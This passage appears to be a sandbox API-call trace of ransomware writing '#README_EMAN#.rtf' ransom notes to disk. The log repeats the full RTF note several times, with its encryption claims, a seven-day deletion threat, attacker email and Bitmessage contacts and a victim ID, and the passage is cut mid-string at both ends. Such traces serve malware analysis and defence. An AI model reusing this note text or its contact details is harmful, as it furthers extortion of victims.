\\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n£\x94\x12ç]z9úW­Á\x7fvß\x84ôΧÐùæËH3\n", lpUsedDefaultChar=0x0) returned 8717 [0278.529] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.530] CloseHandle (hObject=0x2c8) returned 1 [0278.530] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0278.530] GetLastError () returned 0x2 [0278.530] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to 